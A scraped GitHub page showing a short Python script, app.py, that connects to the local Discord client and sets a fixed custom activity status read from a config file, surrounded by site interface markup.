data-hydro-click="{&quot;event_type&quot;:&quot;code_navigation.click_on_blob_definitions&quot;,&quot;payload&quot;:{&quot;action&quot;:&quot;click_on_blob_definitions&quot;,&quot;repository_id&quot;:298526344,&quot;ref&quot;:&quot;master&quot;,&quot;language&quot;:&quot;Python&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="8ab7943d9e2ebd68838936d01c014cb5492553c6b3f67f3ecef74fb8344b8b58" role="button" data-view-component="true" class="Link--secondary css-truncate btn-link"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path> </svg> <span data-menu-button>Jump to</span> <span class="dropdown-caret"></span> </summary> 
<details-menu class="SelectMenu SelectMenu--hasFilter" role="menu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span class="SelectMenu-title">Code definitions</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="jumpto-symbol-select-menu"> <svg aria-label="Close menu" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> </header> <div class="SelectMenu-filter"> <input class="SelectMenu-input form-control js-filterable-field" id="jumpto-symbols-filter-field" type="text" autocomplete="off" spellcheck="false" autofocus placeholder="Filter definitions" aria-label="Filter definitions"> </div> <div class="SelectMenu-list"> <div data-filterable-for="jumpto-symbols-filter-field" data-filterable-type="substring"> <a class="SelectMenu-item d-flex flex-justify-between css-truncate" role="menuitemradio" aria-checked="false" rel="nofollow" data-hydro-click="{&quot;event_type&quot;:&quot;code_navigation.navigate_to_blob_definition&quot;,&quot;payload&quot;:{&quot;action&quot;:&quot;navigate_to_blob_definition&quot;,&quot;repository_id&quot;:298526344,&quot;ref&quot;:&quot;master&quot;,&quot;language&quot;:&quot;Python&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="0cf0b78350c5c2e7878d0e0e8a2344d9d2ea181f5103bfbac5345d842937be4d" href="/agambajwa/discord-custom-activity/blob/master/app.py#L22"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 
4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> <span class="flex-auto css-truncate-target" data-menu-button-text>main</span> <span class="flex-auto d-flex flex-justify-end">Function</span> </a> <a class="SelectMenu-item d-flex flex-justify-between css-truncate" role="menuitemradio" aria-checked="false" rel="nofollow" data-hydro-click="{&quot;event_type&quot;:&quot;code_navigation.navigate_to_blob_definition&quot;,&quot;payload&quot;:{&quot;action&quot;:&quot;navigate_to_blob_definition&quot;,&quot;repository_id&quot;:298526344,&quot;ref&quot;:&quot;master&quot;,&quot;language&quot;:&quot;Python&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="0cf0b78350c5c2e7878d0e0e8a2344d9d2ea181f5103bfbac5345d842937be4d" href="/agambajwa/discord-custom-activity/blob/master/app.py#L40"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> <span class="flex-auto css-truncate-target" data-menu-button-text>set_activity</span> <span class="flex-auto d-flex flex-justify-end">Function</span> </a> </div> </div> <footer class="SelectMenu-footer"> <div class="d-flex flex-justify-between"> Code navigation index up-to-date <svg class="octicon octicon-dot-fill text-green" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M8 4a4 4 0 100 8 4 4 0 000-8z"></path></svg> </div> </footer> </div> </details-menu> </details> </h2> <a href="/agambajwa/discord-custom-activity/find/master" class="js-pjax-capture-input btn mr-2 d-none d-md-block" 
data-pjax data-hotkey="t"> Go to file </a> <details id="blob-more-options-details" data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true" class="btn"> <svg aria-label="More options" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path> </svg> </summary> <div data-view-component="true"> <ul class="dropdown-menu dropdown-menu-sw"> <li class="d-block d-md-none"> <a class="dropdown-item d-flex flex-items-baseline" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;FIND_FILE_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="c1741d2af11cddb7e7412f38207326d10be1eee4009dab1c2fcfffcfe5bfe980" data-ga-click="Repository, find file, location:repo overview" data-hotkey="t" data-pjax="true" href="/agambajwa/discord-custom-activity/find/master"> <span class="flex-auto">Go to file</span> <span class="text-small color-text-secondary" aria-hidden="true">T</span> </a> </li> <li data-toggle-for="blob-more-options-details"> <button data-toggle-for="jumpto-line-details-dialog" type="button" data-view-component="true" class="dropdown-item btn-link"> <span class="d-flex flex-items-baseline"> <span class="flex-auto">Go to line</span> <span class="text-small color-text-secondary" aria-hidden="true">L</span> </span> </button> </li> <li data-toggle-for="blob-more-options-details"> <button data-toggle-for="jumpto-symbol-select-menu" type="button" data-view-component="true" class="dropdown-item btn-link"> <span class="d-flex flex-items-baseline"> <span class="flex-auto">Go to 
definition</span> <span class="text-small color-text-secondary" aria-hidden="true">R</span> </span> </button> </li> <li class="dropdown-divider" role="none"></li> <li> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy path" value="app.py" data-view-component="true" class="dropdown-item cursor-pointer"> Copy path </clipboard-copy> </li> <li> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy permalink" value="https://github.com/agambajwa/discord-custom-activity/blob/9a6488f083af4b9c41113cffbb0b8e4356985c11/app.py" data-view-component="true" class="dropdown-item cursor-pointer"> <span class="d-flex flex-items-baseline"> <span class="flex-auto">Copy permalink</span> </span> </clipboard-copy> </li> </ul> </div> </details> </div> <div class="Box d-flex flex-column flex-shrink-0 mb-3"> <include-fragment src="/agambajwa/discord-custom-activity/contributors/master/app.py" class="commit-loader"> <div class="Box-header d-flex flex-items-center"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-2">&nbsp;</div> </div> <div class="Box-body d-flex flex-items-center" > <div class="Skeleton Skeleton--text col-1">&nbsp;</div> <span class="color-text-danger h6 loader-error">Cannot retrieve contributors at this time</span> </div> </include-fragment> </div> <div data-target="readme-toc.content" class="Box mt-3 position-relative "> <div class="Box-header py-2 pr-2 d-flex flex-shrink-0 flex-md-row flex-items-center" > <div class="text-mono f6 flex-auto pr-3 flex-order-2 flex-md-order-1"> 46 lines (38 sloc) <span class="file-info-divider"></span> 1015 Bytes </div> <div class="d-flex py-1 py-md-0 flex-auto flex-order-1 flex-md-order-2 flex-sm-grow-0 flex-justify-between hide-sm hide-md"> <div class="BtnGroup"> <a href="/agambajwa/discord-custom-activity/raw/master/app.py" id="raw-url" role="button" data-view-component="true" 
class="btn-sm btn BtnGroup-item"> Raw </a> <a href="/agambajwa/discord-custom-activity/blame/master/app.py" data-hotkey="b" role="button" data-view-component="true" class="js-update-url-with-hash btn-sm btn BtnGroup-item"> Blame </a> </div> <div> <a class="btn-octicon tooltipped tooltipped-nw js-remove-unless-platform" data-platforms="windows,mac" href="https://desktop.github.com" aria-label="Open this file in GitHub Desktop" data-ga-click="Repository, open with desktop"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-desktop"> <path fill-rule="evenodd" d="M1.75 2.5h12.5a.25.25 0 01.25.25v7.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25v-7.5a.25.25 0 01.25-.25zM14.25 1H1.75A1.75 1.75 0 000 2.75v7.5C0 11.216.784 12 1.75 12h3.727c-.1 1.041-.52 1.872-1.292 2.757A.75.75 0 004.75 16h6.5a.75.75 0 00.565-1.243c-.772-.885-1.193-1.716-1.292-2.757h3.727A1.75 1.75 0 0016 10.25v-7.5A1.75 1.75 0 0014.25 1zM9.018 12H6.982a5.72 5.72 0 01-.765 2.5h3.566a5.72 5.72 0 01-.765-2.5z"></path> </svg> </a> <remote-clipboard-copy class="d-inline-block btn-octicon" style="height: 26px" data-src="/agambajwa/discord-custom-activity/raw/master/app.py" data-action="click:remote-clipboard-copy#remoteCopy"> <span data-target="remote-clipboard-copy.idle"> <span class="tooltipped tooltipped-nw cursor-pointer" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;COPY_RAW_CONTENTS_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="e53a27ab14298c3efe29c78eae6edddde764a5cc9397f6bfea195fd867c5ff40" aria-label="Copy raw contents"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy"> <path fill-rule="evenodd" 
d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path> </svg> </span></span> <span data-target="remote-clipboard-copy.fetching" hidden="hidden"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </span> <span data-target="remote-clipboard-copy.success" hidden="hidden"> <span class="tooltipped tooltipped-nw" aria-label="Copied!"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check color-text-success"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> </span> <span data-target="remote-clipboard-copy.error" hidden="hidden"> <span class="tooltipped tooltipped-nw" aria-label="Something went wrong. 
Try again."> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert color-text-warning"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> </span> </span> </remote-clipboard-copy> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="inline-form js-update-url-with-hash" action="/agambajwa/discord-custom-activity/edit/master/app.py" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="JNSPx4+edOJ4WuJlWAfZuhILKwlrsffHdo0azFAoNPLBRZkHQ1RfN4vEIE09btacItBs0wbIq0vJGRVkZ2ZA6g==" /> <button class="btn-octicon tooltipped tooltipped-nw" type="submit" aria-label="Fork this project and edit the file" data-hotkey="e" data-disable-with> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-pencil"> <path fill-rule="evenodd" d="M11.013 1.427a1.75 1.75 0 012.474 0l1.086 1.086a1.75 1.75 0 010 2.474l-8.61 8.61c-.21.21-.47.364-.756.445l-3.251.93a.75.75 0 01-.927-.928l.929-3.25a1.75 1.75 0 01.445-.758l8.61-8.61zm1.414 1.06a.25.25 0 00-.354 0L10.811 3.75l1.439 1.44 1.263-1.263a.25.25 0 000-.354l-1.086-1.086zM11.189 6.25L9.75 4.81l-6.286 6.287a.25.25 0 00-.064.108l-.558 1.953 1.953-.558a.249.249 0 00.108-.064l6.286-6.286z"></path> </svg> </button> </form> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="inline-form" action="/agambajwa/discord-custom-activity/delete/master/app.py" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="OibpDzLUKYX9Osb3BVKMD8HPENt+M/zePb/fqBW6lq6ti32WNXO3wezy3hLuFD24emiY+YaU6pw5iBs9SBCWqg==" /> 
<button class="btn-octicon btn-octicon-danger tooltipped tooltipped-nw" type="submit" aria-label="Fork this project and delete the file" data-disable-with> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-trash"> <path fill-rule="evenodd" d="M6.5 1.75a.25.25 0 01.25-.25h2.5a.25.25 0 01.25.25V3h-3V1.75zm4.5 0V3h2.25a.75.75 0 010 1.5H2.75a.75.75 0 010-1.5H5V1.75C5 .784 5.784 0 6.75 0h2.5C10.216 0 11 .784 11 1.75zM4.496 6.675a.75.75 0 10-1.492.15l.66 6.6A1.75 1.75 0 005.405 15h5.19c.9 0 1.652-.681 1.741-1.576l.66-6.6a.75.75 0 00-1.492-.149l-.66 6.6a.25.25 0 01-.249.225h-5.19a.25.25 0 01-.249-.225l-.66-6.6z"></path> </svg> </button> </form> </div> </div> <div class="d-flex hide-lg hide-xl flex-order-2 flex-grow-0"> <details class="dropdown details-reset details-overlay d-inline-block"> <summary class="btn-octicon" aria-haspopup="true" aria-label="possible actions"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path> </svg> </summary> <ul class="dropdown-menu dropdown-menu-sw" style="width: 175px"> <li> <a class="dropdown-item tooltipped tooltipped-nw js-remove-unless-platform" data-platforms="windows,mac" href="https://desktop.github.com" data-ga-click="Repository, open with desktop"> Open with Desktop </a> </li> <li> <a class="dropdown-item" href="/agambajwa/discord-custom-activity/raw/master/app.py"> View raw </a> </li> <li> <remote-clipboard-copy class="dropdown-item" data-src="/agambajwa/discord-custom-activity/raw/master/app.py" data-action="click:remote-clipboard-copy#remoteCopy"> <span data-target="remote-clipboard-copy.idle"> <span class="cursor-pointer" 
data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;COPY_RAW_CONTENTS_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="e53a27ab14298c3efe29c78eae6edddde764a5cc9397f6bfea195fd867c5ff40"> Copy raw contents </span></span> <span data-target="remote-clipboard-copy.fetching" hidden="hidden"> Copy raw contents <span class="d-inline-block position-relative" style="top: 3px"> <svg aria-label="fetching contents…" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </span> </span> <span data-target="remote-clipboard-copy.success" hidden="hidden"> Copy raw contents <svg aria-label="Copied!" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check color-text-success"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <span data-target="remote-clipboard-copy.error" hidden="hidden"> Copy raw contents <svg aria-label="Something went wrong. Try again." 
role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert color-text-warning"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> </span> </remote-clipboard-copy> </li> <li> <a class="dropdown-item" href="/agambajwa/discord-custom-activity/blame/master/app.py"> View blame </a> </li> <li class="dropdown-divider" role="none"></li> <li> <a class="dropdown-item" href="/agambajwa/discord-custom-activity/edit/master/app.py">Edit file</a> </li> <li> <a class="dropdown-item menu-item-danger" href="/agambajwa/discord-custom-activity/delete/master/app.py">Delete file</a> </li> </ul> </details> </div> </div> <div itemprop="text" class="Box-body p-0 blob-wrapper data type-python gist-border-0"> <table class="highlight tab-size js-file-line-container" data-tab-size="8" data-paste-markdown-skip> <tr> <td id="L1" class="blob-num js-line-number" data-line-number="1"></td> <td id="LC1" class="blob-code blob-code-inner js-file-line"><span class=pl-k>from</span> <span class=pl-s1>discoIPC</span> <span class=pl-k>import</span> <span class=pl-s1>ipc</span></td> </tr> <tr> <td id="L2" class="blob-num js-line-number" data-line-number="2"></td> <td id="LC2" class="blob-code blob-code-inner js-file-line"><span class=pl-k>import</span> <span class=pl-s1>configparser</span></td> </tr> <tr> <td id="L3" class="blob-num js-line-number" data-line-number="3"></td> <td id="LC3" class="blob-code blob-code-inner js-file-line"><span class=pl-k>import</span> <span class=pl-s1>time</span></td> </tr> <tr> <td id="L4" class="blob-num js-line-number" data-line-number="4"></td> <td id="LC4" class="blob-code blob-code-inner js-file-line"> 
</td> </tr> <tr> <td id="L5" class="blob-num js-line-number" data-line-number="5"></td> <td id="LC5" class="blob-code blob-code-inner js-file-line"><span class=pl-s1>config</span> <span class=pl-c1>=</span> <span class=pl-s1>configparser</span>.<span class=pl-v>ConfigParser</span>()</td> </tr> <tr> <td id="L6" class="blob-num js-line-number" data-line-number="6"></td> <td id="LC6" class="blob-code blob-code-inner js-file-line"><span class=pl-s1>config</span>.<span class=pl-en>read</span>(<span class=pl-s>&#39;config.ini&#39;</span>)</td> </tr> <tr> <td id="L7" class="blob-num js-line-number" data-line-number="7"></td> <td id="LC7" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L8" class="blob-num js-line-number" data-line-number="8"></td> <td id="LC8" class="blob-code blob-code-inner js-file-line"><span class=pl-s1>base_activity</span> <span class=pl-c1>=</span> {</td> </tr> <tr> <td id="L9" class="blob-num js-line-number" data-line-number="9"></td> <td id="LC9" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;details&#39;</span>: <span class=pl-s>&#39;Custom details&#39;</span>,</td> </tr> <tr> <td id="L10" class="blob-num js-line-number" data-line-number="10"></td> <td id="LC10" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;state&#39;</span> : <span class=pl-s>&#39;Custom state&#39;</span>,</td> </tr> <tr> <td id="L11" class="blob-num js-line-number" data-line-number="11"></td> <td id="LC11" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;assets&#39;</span>: {</td> </tr> <tr> <td id="L12" class="blob-num js-line-number" data-line-number="12"></td> <td id="LC12" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;large_image&#39;</span>: <span class=pl-s>&#39;image_name&#39;</span>,</td> </tr> <tr> <td id="L13" class="blob-num js-line-number" data-line-number="13"></td> <td id="LC13" class="blob-code blob-code-inner js-file-line"> <span 
class=pl-s>&#39;large_text&#39;</span>: <span class=pl-s>&#39;Image text&#39;</span>,</td> </tr> <tr> <td id="L14" class="blob-num js-line-number" data-line-number="14"></td> <td id="LC14" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;small_image&#39;</span>: <span class=pl-s>&#39;small_image_name&#39;</span>,</td> </tr> <tr> <td id="L15" class="blob-num js-line-number" data-line-number="15"></td> <td id="LC15" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;small_text&#39;</span>: <span class=pl-s>&#39;Small image text&#39;</span></td> </tr> <tr> <td id="L16" class="blob-num js-line-number" data-line-number="16"></td> <td id="LC16" class="blob-code blob-code-inner js-file-line"> },</td> </tr> <tr> <td id="L17" class="blob-num js-line-number" data-line-number="17"></td> <td id="LC17" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;party&#39;</span>: {</td> </tr> <tr> <td id="L18" class="blob-num js-line-number" data-line-number="18"></td> <td id="LC18" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;size&#39;</span>: [<span class=pl-c1>1</span>, <span class=pl-c1>5</span>]</td> </tr> <tr> <td id="L19" class="blob-num js-line-number" data-line-number="19"></td> <td id="LC19" class="blob-code blob-code-inner js-file-line"> }</td> </tr> <tr> <td id="L20" class="blob-num js-line-number" data-line-number="20"></td> <td id="LC20" class="blob-code blob-code-inner js-file-line">}</td> </tr> <tr> <td id="L21" class="blob-num js-line-number" data-line-number="21"></td> <td id="LC21" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L22" class="blob-num js-line-number" data-line-number="22"></td> <td id="LC22" class="blob-code blob-code-inner js-file-line"><span class=pl-k>def</span> <span class=pl-en>main</span>():</td> </tr> <tr> <td id="L23" class="blob-num js-line-number" data-line-number="23"></td> <td id="LC23" class="blob-code blob-code-inner js-file-line"> 
<span class=pl-s1>client</span> <span class=pl-c1>=</span> <span class=pl-s1>ipc</span>.<span class=pl-v>DiscordIPC</span>(<span class=pl-s1>config</span>[<span class=pl-s>&#39;CLIENT&#39;</span>][<span class=pl-s>&#39;client_id&#39;</span>])</td> </tr> <tr> <td id="L24" class="blob-num js-line-number" data-line-number="24"></td> <td id="LC24" class="blob-code blob-code-inner js-file-line"> <span class=pl-c># Connect to Discord Client</span></td> </tr> <tr> <td id="L25" class="blob-num js-line-number" data-line-number="25"></td> <td id="LC25" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>client</span>.<span class=pl-en>connect</span>()</td> </tr> <tr> <td id="L26" class="blob-num js-line-number" data-line-number="26"></td> <td id="LC26" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L27" class="blob-num js-line-number" data-line-number="27"></td> <td id="LC27" class="blob-code blob-code-inner js-file-line"> <span class=pl-en>print</span>(<span class=pl-s>&#39;<span class=pl-cce>\n</span>Starting Custom Activity...<span class=pl-cce>\n</span>&#39;</span>)</td> </tr> <tr> <td id="L28" class="blob-num js-line-number" data-line-number="28"></td> <td id="LC28" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>time</span>.<span class=pl-en>sleep</span>(<span class=pl-c1>5</span>)</td> </tr> <tr> <td id="L29" class="blob-num js-line-number" data-line-number="29"></td> <td id="LC29" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L30" class="blob-num js-line-number" data-line-number="30"></td> <td id="LC30" class="blob-code blob-code-inner js-file-line"> <span class=pl-k>try</span>:</td> </tr> <tr> <td id="L31" class="blob-num js-line-number" data-line-number="31"></td> <td id="LC31" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>client</span>.<span class=pl-en>update_activity</span>(<span class=pl-en>set_activity</span>()) <span class=pl-c># Update 
Activity</span></td> </tr> <tr> <td id="L32" class="blob-num js-line-number" data-line-number="32"></td> <td id="LC32" class="blob-code blob-code-inner js-file-line"> <span class=pl-k>while</span> <span class=pl-c1>True</span>:</td> </tr> <tr> <td id="L33" class="blob-num js-line-number" data-line-number="33"></td> <td id="LC33" class="blob-code blob-code-inner js-file-line"> <span class=pl-en>input</span>(<span class=pl-s>&#39;<span class=pl-cce>\n</span>Connected! &#39;</span>)</td> </tr> <tr> <td id="L34" class="blob-num js-line-number" data-line-number="34"></td> <td id="LC34" class="blob-code blob-code-inner js-file-line"> <span class=pl-c># Do nothing </span></td> </tr> <tr> <td id="L35" class="blob-num js-line-number" data-line-number="35"></td> <td id="LC35" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L36" class="blob-num js-line-number" data-line-number="36"></td> <td id="LC36" class="blob-code blob-code-inner js-file-line"> <span class=pl-k>except</span> <span class=pl-v>KeyboardInterrupt</span>:</td> </tr> <tr> <td id="L37" class="blob-num js-line-number" data-line-number="37"></td> <td id="LC37" class="blob-code blob-code-inner js-file-line"> <span class=pl-en>print</span>(<span class=pl-s>&#39;Disconnecting...<span class=pl-cce>\n</span>&#39;</span>)</td> </tr> <tr> <td id="L38" class="blob-num js-line-number" data-line-number="38"></td> <td id="LC38" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>client</span>.<span class=pl-en>disconnect</span>()</td> </tr> <tr> <td id="L39" class="blob-num js-line-number" data-line-number="39"></td> <td id="LC39" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L40" class="blob-num js-line-number" data-line-number="40"></td> <td id="LC40" class="blob-code blob-code-inner js-file-line"><span class=pl-k>def</span> <span class=pl-en>set_activity</span>():</td> </tr> <tr> <td id="L41" class="blob-num js-line-number" data-line-number="41"></td> <td 
id="LC41" class="blob-code blob-code-inner js-file-line"> <span class=pl-c># Set acitivty for the player.</span></td> </tr> <tr> <td id="L42" class="blob-num js-line-number" data-line-number="42"></td> <td id="LC42" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>activity</span> <span class=pl-c1>=</span> <span class=pl-s1>base_activity</span></td> </tr> <tr> <td id="L43" class="blob-num js-line-number" data-line-number="43"></td> <td id="LC43" class="blob-code blob-code-inner js-file-line"> <span class=pl-k>return</span> <span class=pl-s1>activity</span></td> </tr> <tr> <td id="L44" class="blob-num js-line-number" data-line-number="44"></td> <td id="LC44" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L45" class="blob-num js-line-number" data-line-number="45"></td> <td id="LC45" class="blob-code blob-code-inner js-file-line"><span class=pl-k>if</span> <span class=pl-s1>__name__</span> <span class=pl-c1>==</span> <span class=pl-s>&#39;__main__&#39;</span>:</td> </tr> <tr> <td id="L46" class="blob-num js-line-number" data-line-number="46"></td> <td id="LC46" class="blob-code blob-code-inner js-file-line"> <span class=pl-en>main</span>()</td> </tr> </table> <details class="details-reset details-overlay BlobToolbar position-absolute js-file-line-actions dropdown d-none" aria-hidden="true"> <summary class="btn-octicon ml-0 px-2 p-0 color-bg-primary border color-border-tertiary rounded-1" aria-label="Inline file action toolbar"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path> </svg> </summary> <details-menu> <ul class="BlobToolbar-dropdown dropdown-menu dropdown-menu-se ml-2 mt-2" style="width:185px" > <li> <clipboard-copy role="menuitem" class="dropdown-item" id="js-copy-lines" 
